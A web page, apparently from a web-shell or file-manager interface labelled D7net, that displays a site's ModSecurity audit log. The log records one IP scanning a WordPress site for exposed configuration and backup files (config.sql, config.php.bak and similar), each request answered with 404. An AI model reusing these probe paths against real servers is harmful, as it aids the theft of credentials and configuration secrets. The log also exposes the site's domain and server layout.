D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
var
/
log
/
Filename :
modsec_audit.log
back
Copy
--4929152a-A-- [15/Jun/2025:00:00:18.094131 +0530] aE2_uOblMrvfPBGDB2xBngAAAAg 185.177.72.108 59766 127.0.0.1 7081 --4929152a-B-- GET /config.dat HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4929152a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --4929152a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".dat"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.dat"] [unique_id "aE2_uOblMrvfPBGDB2xBngAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925816329017 1765205 (- - -) Stopwatch2: 1749925816329017 1765205; combined=1737, p1=358, p2=1277, p3=0, p4=0, p5=102, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4929152a-Z-- --c92e2d33-A-- [15/Jun/2025:00:00:20.033378 +0530] aE2_ugQYZLZu4P5jJ0ihgQAAAAo 185.177.72.108 59822 127.0.0.1 7081 --c92e2d33-B-- GET /config.inc HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c92e2d33-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28831 Connection: close Content-Type: text/html; charset=UTF-8 --c92e2d33-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.inc"] [unique_id "aE2_ugQYZLZu4P5jJ0ihgQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925818334268 1699177 (- - -) Stopwatch2: 1749925818334268 1699177; combined=1975, p1=389, p2=1513, p3=0, p4=0, p5=73, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c92e2d33-Z-- --d2fb5d31-A-- [15/Jun/2025:00:00:22.048826 +0530] aE2_vOblMrvfPBGDB2xBnwAAAAg 185.177.72.108 41108 127.0.0.1 7081 --d2fb5d31-B-- GET /config.inc.bak HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d2fb5d31-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28831 Connection: close Content-Type: text/html; charset=UTF-8 --d2fb5d31-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.inc.bak"] [unique_id "aE2_vOblMrvfPBGDB2xBnwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925820255932 1792969 (- - -) Stopwatch2: 1749925820255932 1792969; combined=1948, p1=376, p2=1466, p3=0, p4=0, p5=105, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2fb5d31-Z-- --c1373878-A-- [15/Jun/2025:00:00:23.931010 +0530] aE2_vm3GPR2TokqXa4EJrQAAAAA 185.177.72.108 41152 127.0.0.1 7081 --c1373878-B-- GET /config.inc.old HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c1373878-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28835 Connection: close Content-Type: text/html; charset=UTF-8 --c1373878-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".inc.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.inc.old"] [unique_id "aE2_vm3GPR2TokqXa4EJrQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925822272059 1659017 (- - -) Stopwatch2: 1749925822272059 1659017; combined=1630, p1=312, p2=1238, p3=0, p4=0, p5=79, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c1373878-Z-- --cf645b6f-A-- [15/Jun/2025:00:00:35.449163 +0530] aE2_yeblMrvfPBGDB2xBpAAAAAg 185.177.72.108 41270 127.0.0.1 7081 --cf645b6f-B-- GET /config.ini.bak HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cf645b6f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28833 Connection: close Content-Type: text/html; charset=UTF-8 --cf645b6f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.ini.bak"] [unique_id "aE2_yeblMrvfPBGDB2xBpAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925833787376 1661854 (- - -) Stopwatch2: 1749925833787376 1661854; combined=2041, p1=349, p2=1602, p3=0, p4=0, p5=89, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cf645b6f-Z-- --37adfa1c-A-- [15/Jun/2025:00:00:37.296893 +0530] aE2_yzJUpYCHmx9cDl7fvwAAAAM 185.177.72.108 41360 127.0.0.1 7081 --37adfa1c-B-- GET /config.ini.old HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --37adfa1c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --37adfa1c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".ini.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.ini.old"] [unique_id "aE2_yzJUpYCHmx9cDl7fvwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925835672586 1624382 (- - -) Stopwatch2: 1749925835672586 1624382; combined=1751, p1=309, p2=1365, p3=0, p4=0, p5=77, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --37adfa1c-Z-- --5202d14a-A-- [15/Jun/2025:00:00:47.224656 +0530] aE2_1W3GPR2TokqXa4EJtwAAAAA 185.177.72.108 47058 127.0.0.1 7081 --5202d14a-B-- GET /config.old HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5202d14a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28835 Connection: close Content-Type: text/html; charset=UTF-8 --5202d14a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.old"] [unique_id "aE2_1W3GPR2TokqXa4EJtwAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925845525055 1699672 (- - -) Stopwatch2: 1749925845525055 1699672; combined=1980, p1=515, p2=1381, p3=0, p4=0, p5=84, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5202d14a-Z-- --5fa98f22-A-- [15/Jun/2025:00:00:53.213163 +0530] aE2_2-blMrvfPBGDB2xBrgAAAAg 185.177.72.108 58662 127.0.0.1 7081 --5fa98f22-B-- GET /config.php.bak HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5fa98f22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --5fa98f22-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.php.bak"] [unique_id "aE2_2-blMrvfPBGDB2xBrgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925851596743 1616488 (- - -) Stopwatch2: 1749925851596743 1616488; combined=2309, p1=305, p2=1919, p3=0, p4=0, p5=84, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5fa98f22-Z-- --69c6bd4c-A-- [15/Jun/2025:00:00:56.980217 +0530] aE2_3_gQcZu6vRSfy050tQAAAAI 185.177.72.108 58988 127.0.0.1 7081 --69c6bd4c-B-- GET /config.php.inc HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --69c6bd4c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --69c6bd4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".php.inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.php.inc"] [unique_id "aE2_3_gQcZu6vRSfy050tQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925855308518 1671798 (- - -) Stopwatch2: 1749925855308518 1671798; combined=1784, p1=314, p2=1360, p3=0, p4=0, p5=109, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --69c6bd4c-Z-- --719e2074-A-- [15/Jun/2025:00:01:00.824054 +0530] aE2_4zJUpYCHmx9cDl7fzgAAAAM 185.177.72.108 59082 127.0.0.1 7081 --719e2074-B-- GET /config.php.old HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --719e2074-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --719e2074-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.php.old"] [unique_id "aE2_4zJUpYCHmx9cDl7fzgAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925859121056 1703091 (- - -) Stopwatch2: 1749925859121056 1703091; combined=1645, p1=315, p2=1207, p3=0, p4=0, p5=123, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --719e2074-Z-- --ba80202c-A-- [15/Jun/2025:00:01:14.169394 +0530] aE2_8Cj1NB6R8D1b9l7D1AAAAAE 185.177.72.108 43718 127.0.0.1 7081 --ba80202c-B-- GET /config.sql HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ba80202c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28835 Connection: close Content-Type: text/html; charset=UTF-8 --ba80202c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.sql"] [unique_id "aE2_8Cj1NB6R8D1b9l7D1AAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925872489610 1679868 (- - -) Stopwatch2: 1749925872489610 1679868; combined=2174, p1=416, p2=1651, p3=0, p4=0, p5=106, sr=117, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ba80202c-Z-- --3388fb62-A-- [15/Jun/2025:00:01:25.638611 +0530] aE2__PgQcZu6vRSfy050vwAAAAI 185.177.72.108 50118 127.0.0.1 7081 --3388fb62-B-- GET /config.properties.bak HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3388fb62-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28835 Connection: close Content-Type: text/html; charset=UTF-8 --3388fb62-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/config.properties.bak"] [unique_id "aE2__PgQcZu6vRSfy050vwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925884025425 1613266 (- - -) Stopwatch2: 1749925884025425 1613266; combined=1622, p1=302, p2=1211, p3=0, p4=0, p5=109, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3388fb62-Z-- --d3f97b00-A-- [15/Jun/2025:00:03:20.769214 +0530] aE3Ab_gQcZu6vRSfy0505wAAAAI 185.177.72.108 59900 127.0.0.1 7081 --d3f97b00-B-- GET /app.config HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d3f97b00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28836 Connection: close Content-Type: text/html; charset=UTF-8 --d3f97b00-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.tandonamit.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.tandonamit.com"] [uri "/app.config"] [unique_id "aE3Ab_gQcZu6vRSfy0505wAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749925999076799 1692510 (- - -) Stopwatch2: 1749925999076799 1692510; combined=1985, 